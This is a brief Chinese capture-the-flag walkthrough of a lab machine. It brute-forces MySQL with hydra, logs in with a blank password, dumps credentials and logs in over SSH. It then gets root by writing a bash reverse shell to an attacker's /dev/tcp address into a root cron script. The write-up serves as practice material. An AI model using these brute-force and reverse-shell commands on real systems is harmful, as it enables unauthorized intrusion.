📦靶机发现:
📦端口扫描:
📦对3306端口进行爆破
hydra -l biaomei -P /home/biaomei/pass.txt 192.168.232.1180 -vV
vV 显示爆破过程
📘此时没有一直爆破失败,查阅其他发现密码为空
📦3306弱口令登录
📦查看数据库内容
得到账号密码
mistic
testP@$$swordmistic
📦ssh登录
ssh mistic@192.168.232.180
📦提权:
📕查看是否可以sudo 提权
📕发现有使用root权限的定时任务
考虑使用反弹shell获取权限
📕更改logrot.sh文件内容
bash -i >& /dev/tcp/192.168.232.181/4444 0>&1
📕kali攻击机监听4444端口,并提权成功
📕获得flag